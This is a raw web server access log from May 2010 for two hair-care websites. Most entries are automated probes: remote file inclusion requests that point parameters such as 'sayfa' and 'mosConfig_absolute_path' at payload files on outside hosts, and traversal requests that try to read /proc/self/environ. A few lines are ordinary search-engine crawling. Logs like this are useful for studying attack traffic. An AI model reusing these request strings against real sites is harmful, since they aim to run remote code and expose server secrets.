124.49.100.254 - - [03/May/2010:08:03:39 -0700] "GET /logs/skin/zero_vote/error.php?dir=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/.cok/P1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
124.49.100.254 - - [03/May/2010:08:03:39 -0700] "GET /logs/access_100125.log/skin/zero_vote/error.php?dir=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/.cok/P1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
81.177.33.14 - - [03/May/2010:08:07:36 -0700] "GET /logs//main.php?sayfa=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/.cok/P1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
81.177.33.14 - - [03/May/2010:08:07:36 -0700] "GET /logs/access_091221.log%20%20//main.php?sayfa=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/.cok/P1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
81.177.33.14 - - [03/May/2010:08:07:36 -0700] "GET /main.php?sayfa=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/.cok/P1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
187.45.193.159 - - [03/May/2010:08:08:18 -0700] "GET /logs/access_100412.log///index.php?option=com_flyspray&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
187.45.193.159 - - [03/May/2010:08:08:19 -0700] "GET //index.php?option=com_flyspray&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
187.45.193.159 - - [03/May/2010:08:08:20 -0700] "GET /logs///index.php?option=com_flyspray&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
187.45.193.159 - - [03/May/2010:08:09:11 -0700] "GET /logs/access.log///index.php?option=com_flyspray&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
187.45.193.159 - - [03/May/2010:08:09:11 -0700] "GET //index.php?option=com_flyspray&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
187.45.193.159 - - [03/May/2010:08:09:12 -0700] "GET /logs///index.php?option=com_flyspray&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
81.177.33.14 - - [03/May/2010:08:09:56 -0700] "GET /logs/access_091221.log%20%20//main.php?sayfa=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/.cok/P1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
81.177.33.14 - - [03/May/2010:08:09:56 -0700] "GET /logs//main.php?sayfa=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/.cok/P1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
81.177.33.14 - - [03/May/2010:08:09:56 -0700] "GET /main.php?sayfa=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/.cok/P1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
187.45.193.159 - - [03/May/2010:08:11:29 -0700] "GET /logs/access.log///index.php?option=com_flyspray&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
187.45.193.159 - - [03/May/2010:08:11:30 -0700] "GET //index.php?option=com_flyspray&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
187.45.193.159 - - [03/May/2010:08:11:30 -0700] "GET /logs///index.php?option=com_flyspray&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
81.177.33.14 - - [03/May/2010:08:12:45 -0700] "GET /logs//main.php?sayfa=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/.cok/P1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
81.177.33.14 - - [03/May/2010:08:12:45 -0700] "GET /logs/access_091221.log%20%20//main.php?sayfa=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/.cok/P1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
81.177.33.14 - - [03/May/2010:08:12:45 -0700] "GET /main.php?sayfa=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/.cok/P1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
187.45.193.159 - - [03/May/2010:08:14:24 -0700] "GET /logs/access_100412.log///index.php?option=com_flyspray&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
187.45.193.159 - - [03/May/2010:08:15:05 -0700] "GET /logs/access.log///index.php?option=com_flyspray&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
187.45.193.159 - - [03/May/2010:08:15:05 -0700] "GET //index.php?option=com_flyspray&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
187.45.193.159 - - [03/May/2010:08:15:05 -0700] "GET /logs///index.php?option=com_flyspray&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
121.190.102.21 - - [03/May/2010:08:16:05 -0700] "GET /logs//main.php?sayfa=http://www.boomong.com/bbs//data/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
121.190.102.21 - - [03/May/2010:08:16:05 -0700] "GET /main.php?sayfa=http://www.boomong.com/bbs//data/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
121.190.102.21 - - [03/May/2010:08:16:05 -0700] "GET /logs/access_100412.log%20%20//main.php?sayfa=http://www.boomong.com/bbs//data/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
121.190.102.21 - - [03/May/2010:08:16:26 -0700] "GET /logs/access_091221.log%20%20//main.php?sayfa=http://www.boomong.com/bbs//data/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
193.47.80.39 - - [03/May/2010:08:18:43 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Exabot/3.0; +http://www.exabot.com/go/robot)" "freehairsecrets.com"
193.47.80.39 - - [03/May/2010:08:18:43 -0700] "GET /?N=A HTTP/1.1" 200 926 "-" "Mozilla/5.0 (compatible; Exabot/3.0; +http://www.exabot.com/go/robot)" "freehairsecrets.com"
91.121.25.16 - - [03/May/2010:08:20:06 -0700] "GET /index.php?option=com_flyspray&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.freehairsecrets.com"
91.121.25.16 - - [03/May/2010:08:20:06 -0700] "GET /index.php?option=com_flyspray&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "growlonghairfast.com"
74.50.85.15 - - [03/May/2010:08:20:16 -0700] "GET //?path=http://www.mjc.kg.kr//eat_file/.../head.txt?? HTTP/1.1" 200 926 "-" "Mozilla/5.0" "growlonghairfast.com"
74.50.85.15 - - [03/May/2010:08:20:16 -0700] "GET /logs/access_100125.log///?path=http://www.mjc.kg.kr//eat_file/.../head.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.50.85.15 - - [03/May/2010:08:20:16 -0700] "GET /logs///?path=http://www.mjc.kg.kr//eat_file/.../head.txt?? HTTP/1.1" 200 5091 "-" "Mozilla/5.0" "growlonghairfast.com"
121.190.102.21 - - [03/May/2010:08:20:31 -0700] "GET /logs/access_100412.log%20%20//main.php?sayfa=http://www.boomong.com/bbs//data/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
121.190.102.21 - - [03/May/2010:08:20:31 -0700] "GET /main.php?sayfa=http://www.boomong.com/bbs//data/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
121.190.102.21 - - [03/May/2010:08:20:31 -0700] "GET /logs//main.php?sayfa=http://www.boomong.com/bbs//data/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
121.190.102.21 - - [03/May/2010:08:20:32 -0700] "GET /logs/access_091221.log%20%20//main.php?sayfa=http://www.boomong.com/bbs//data/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
67.19.33.58 - - [03/May/2010:08:21:41 -0700] "GET /logs/mcf.php?content=http://www.sunmulwang.com/bbs/kboard/data/freeboard/image1.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
67.19.33.58 - - [03/May/2010:08:21:41 -0700] "GET /mcf.php?content=http://www.sunmulwang.com/bbs/kboard/data/freeboard/image1.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
67.19.33.58 - - [03/May/2010:08:21:41 -0700] "GET /logs/access_091221.log%20%20/mcf.php?content=http://www.sunmulwang.com/bbs/kboard/data/freeboard/image1.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
77.88.25.28 - - [03/May/2010:08:21:54 -0700] "GET /freehairsecretsphp/viewtopic.php?p=13109 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.freehairsecrets.com"
81.177.33.14 - - [03/May/2010:08:21:57 -0700] "GET /logs/access_091221.log%20%20//main.php?sayfa=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/.cok/P1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
81.177.33.14 - - [03/May/2010:08:21:57 -0700] "GET /logs//main.php?sayfa=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/.cok/P1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
81.177.33.14 - - [03/May/2010:08:21:57 -0700] "GET /main.php?sayfa=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/.cok/P1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
67.19.33.58 - - [03/May/2010:08:27:41 -0700] "GET /logs/access_091221.log/mcf.php?content=http://www.sunmulwang.com/bbs/kboard/data/freeboard/image1.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
91.78.243.191 - - [03/May/2010:08:27:53 -0700] "GET /freehairsecretsphp/index.php HTTP/1.0" 200 333 "http://www.freehairsecrets.com/freehairsecretsphp/index.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.freehairsecrets.com"
91.78.243.191 - - [03/May/2010:08:27:53 -0700] "GET / HTTP/1.0" 200 910 "http://www.freehairsecrets.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.freehairsecrets.com"
91.121.25.16 - - [03/May/2010:08:32:44 -0700] "GET /logs/access_100426.log//index.php?option=com_flyspray&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "growlonghairfast.com"
91.121.25.16 - - [03/May/2010:08:32:44 -0700] "GET /index.php?option=com_flyspray&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "growlonghairfast.com"
91.121.25.16 - - [03/May/2010:08:32:44 -0700] "GET /logs//index.php?option=com_flyspray&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "growlonghairfast.com"
119.235.237.85 - - [03/May/2010:08:33:16 -0700] "GET /freehairsecretsphp/viewtopic.php?p=12036 HTTP/1.1" 200 349 "-" "Yeti/1.0 (NHN Corp.; http://help.naver.com/robots/)" "www.freehairsecrets.com"
209.221.150.100 - - [03/May/2010:08:34:40 -0700] "GET /logs/access_100111.log//skin/zero_vote/error.php?dir=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/.cok/P1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
216.131.91.180 - - [03/May/2010:08:34:46 -0700] "GET /logs/access_100412.log%20%20//main.php?sayfa=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
216.131.91.180 - - [03/May/2010:08:34:46 -0700] "GET /main.php?sayfa=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
216.131.91.180 - - [03/May/2010:08:34:46 -0700] "GET /logs//main.php?sayfa=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
216.131.91.180 - - [03/May/2010:08:34:56 -0700] "GET /logs//main.php?sayfa=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
216.131.91.180 - - [03/May/2010:08:34:56 -0700] "GET /main.php?sayfa=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
216.131.91.180 - - [03/May/2010:08:34:56 -0700] "GET /logs/access_100412.log%20%20//main.php?sayfa=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
216.131.91.180 - - [03/May/2010:08:34:57 -0700] "GET /logs/access_091221.log%20%20//main.php?sayfa=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
81.177.33.14 - - [03/May/2010:08:35:24 -0700] "GET /logs/access_091221.log%20%20//main.php?sayfa=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/.cok/P1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
81.177.33.14 - - [03/May/2010:08:35:24 -0700] "GET /logs//main.php?sayfa=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/.cok/P1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
81.177.33.14 - - [03/May/2010:08:35:24 -0700] "GET /main.php?sayfa=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/.cok/P1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
91.121.25.16 - - [03/May/2010:08:35:32 -0700] "GET /logs/access.log//index.php?option=com_flyspray&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "growlonghairfast.com"
91.121.25.16 - - [03/May/2010:08:36:28 -0700] "GET /cms_detect.php?include=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "growlonghairfast.com"
91.121.25.16 - - [03/May/2010:08:38:18 -0700] "GET /logs/access_100315.log//cms_detect.php?include=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "growlonghairfast.com"
91.121.25.16 - - [03/May/2010:08:38:19 -0700] "GET /cms_detect.php?include=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "growlonghairfast.com"
91.121.25.16 - - [03/May/2010:08:38:19 -0700] "GET /logs//cms_detect.php?include=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "growlonghairfast.com"
216.131.91.180 - - [03/May/2010:08:38:50 -0700] "GET /logs/access_091221.log%20%20//main.php?sayfa=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
121.88.4.141 - - [03/May/2010:08:39:11 -0700] "GET //?path=http://www.howtolisten.kr//parti/data/admin/auto1.txt??? HTTP/1.1" 200 926 "-" "Mozilla/5.0" "growlonghairfast.com"
121.88.4.141 - - [03/May/2010:08:39:11 -0700] "GET /logs///?path=http://www.howtolisten.kr//parti/data/admin/auto1.txt??? HTTP/1.1" 200 5091 "-" "Mozilla/5.0" "growlonghairfast.com"
121.88.4.141 - - [03/May/2010:08:39:11 -0700] "GET /logs/access_100125.log///?path=http://www.howtolisten.kr//parti/data/admin/auto1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
209.221.150.100 - - [03/May/2010:08:39:58 -0700] "GET /logs/skin/zero_vote/error.php?dir=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/.cok/P1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
209.221.150.100 - - [03/May/2010:08:39:58 -0700] "GET /skin/zero_vote/error.php?dir=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/.cok/P1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
209.221.150.100 - - [03/May/2010:08:39:58 -0700] "GET /logs/access_100111.log%20%20/skin/zero_vote/error.php?dir=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/.cok/P1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
209.221.150.100 - - [03/May/2010:08:41:30 -0700] "GET /logs/skin/zero_vote/error.php?dir=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/.cok/P1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
209.221.150.100 - - [03/May/2010:08:41:30 -0700] "GET /skin/zero_vote/error.php?dir=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/.cok/P1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
209.221.150.100 - - [03/May/2010:08:41:30 -0700] "GET /logs/access_100111.log%20%20/skin/zero_vote/error.php?dir=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/.cok/P1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
91.121.25.16 - - [03/May/2010:08:42:00 -0700] "GET /logs/access_100315.log//cms_detect.php?include=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "growlonghairfast.com"
91.121.25.16 - - [03/May/2010:08:42:01 -0700] "GET /cms_detect.php?include=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "growlonghairfast.com"
91.121.25.16 - - [03/May/2010:08:42:01 -0700] "GET /logs//cms_detect.php?include=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "growlonghairfast.com"
216.131.91.180 - - [03/May/2010:08:44:46 -0700] "GET /logs/access_100412.log//main.php?sayfa=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
216.131.91.180 - - [03/May/2010:08:44:50 -0700] "GET /logs/access_091221.log//main.php?sayfa=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
216.131.91.180 - - [03/May/2010:08:44:51 -0700] "GET /logs/access_100412.log//main.php?sayfa=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
216.131.91.180 - - [03/May/2010:08:44:51 -0700] "GET /logs/access_091221.log//main.php?sayfa=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
66.249.65.110 - - [03/May/2010:08:48:07 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "freehairsecrets.com"
119.235.237.93 - - [03/May/2010:08:48:27 -0700] "GET /freehairsecretsphp/viewtopic.php?p=16913 HTTP/1.1" 200 349 "-" "Yeti/1.0 (NHN Corp.; http://help.naver.com/robots/)" "growlonghairfast.com"
77.88.25.28 - - [03/May/2010:08:58:23 -0700] "GET /freehairsecretsphp/viewtopic.php?p=13380 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.freehairsecrets.com"
180.210.205.118 - - [03/May/2010:08:59:36 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/.cok/P1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
180.210.205.118 - - [03/May/2010:08:59:36 -0700] "GET /skin/zero_vote/error.php?dir=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/.cok/P1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
180.210.205.118 - - [03/May/2010:08:59:36 -0700] "GET /logs/access_100315.log%20%20//skin/zero_vote/error.php?dir=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/.cok/P1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
119.235.237.18 - - [03/May/2010:09:00:14 -0700] "GET /freehairsecretsphp/viewtopic.php?p=18806 HTTP/1.1" 200 349 "-" "Yeti/1.0 (NHN Corp.; http://help.naver.com/robots/)" "www.freehairsecrets.com"
180.210.205.118 - - [03/May/2010:09:01:13 -0700] "GET /logs/access_100315.log%20%20//skin/zero_vote/error.php?dir=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/.cok/P1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
180.210.205.118 - - [03/May/2010:09:01:13 -0700] "GET /skin/zero_vote/error.php?dir=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/.cok/P1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
180.210.205.118 - - [03/May/2010:09:01:13 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/.cok/P1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
84.108.123.203 - - [03/May/2010:09:01:34 -0700] "GET /freehairsecretsphp/index.php HTTP/1.0" 200 333 "http://growlonghairfast.com/freehairsecretsphp/index.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; Win 9x 4.90)" "growlonghairfast.com"
180.210.205.118 - - [03/May/2010:09:05:27 -0700] "GET /skin/zero_vote/error.php?dir=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/.cok/P1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
180.210.205.118 - - [03/May/2010:09:05:27 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/.cok/P1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
180.210.205.118 - - [03/May/2010:09:05:27 -0700] "GET /logs/access_100315.log%20%20//skin/zero_vote/error.php?dir=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/.cok/P1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
119.235.237.19 - - [03/May/2010:09:05:40 -0700] "GET /freehairsecretsphp/viewtopic.php?p=16404 HTTP/1.1" 200 349 "-" "Yeti/1.0 (NHN Corp.; http://help.naver.com/robots/)" "growlonghairfast.com"
67.195.114.238 - - [03/May/2010:09:13:13 -0700] "GET /tmp/?N=D HTTP/1.0" 200 643 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.freehairsecrets.com"
209.221.150.100 - - [03/May/2010:09:13:29 -0700] "GET /skin/zero_vote/error.php?dir=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/.cok/P1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
209.221.150.100 - - [03/May/2010:09:13:29 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/.cok/P1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
209.221.150.100 - - [03/May/2010:09:13:29 -0700] "GET /logs/access_100315.log%20%20//skin/zero_vote/error.php?dir=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/.cok/P1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
209.221.150.100 - - [03/May/2010:09:13:32 -0700] "GET /skin/zero_vote/error.php?dir=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/.cok/P1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
209.221.150.100 - - [03/May/2010:09:13:32 -0700] "GET /logs/access_100315.log%20%20//skin/zero_vote/error.php?dir=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/.cok/P1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
209.221.150.100 - - [03/May/2010:09:13:32 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/.cok/P1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
95.108.150.235 - - [03/May/2010:09:14:15 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "Yandex/1.01.001 (compatible; Win16; H)" "www.freehairsecrets.com"
95.108.150.235 - - [03/May/2010:09:14:17 -0700] "GET / HTTP/1.1" 200 926 "-" "Yandex/1.01.001 (compatible; Win16; H)" "www.freehairsecrets.com"
95.108.150.235 - - [03/May/2010:09:14:19 -0700] "GET / HTTP/1.1" 200 926 "-" "Yandex/1.01.001 (compatible; Win16; H)" "www.freehairsecrets.com"
95.108.150.235 - - [03/May/2010:09:14:21 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "Yandex/1.01.001 (compatible; Win16; H)" "freehairsecrets.com"
95.108.150.235 - - [03/May/2010:09:14:22 -0700] "GET / HTTP/1.1" 200 926 "-" "Yandex/1.01.001 (compatible; Win16; H)" "freehairsecrets.com"
95.108.150.235 - - [03/May/2010:09:14:24 -0700] "GET / HTTP/1.1" 200 926 "-" "Yandex/1.01.001 (compatible; Win16; H)" "freehairsecrets.com"
84.108.123.203 - - [03/May/2010:09:18:21 -0700] "GET /freehairsecretsphp/index.php HTTP/1.0" 200 333 "http://freehairsecrets.com/freehairsecretsphp/index.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; Win 9x 4.90)" "freehairsecrets.com"
207.45.185.178 - - [03/May/2010:09:22:30 -0700] "GET /logs/access_100412.log%20%20/?mosConfig_absolute_path=http://enniskillengaa.com//id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
207.45.185.178 - - [03/May/2010:09:22:30 -0700] "GET /?mosConfig_absolute_path=http://enniskillengaa.com//id1.txt? HTTP/1.1" 200 926 "-" "Mozilla/5.0" "growlonghairfast.com"
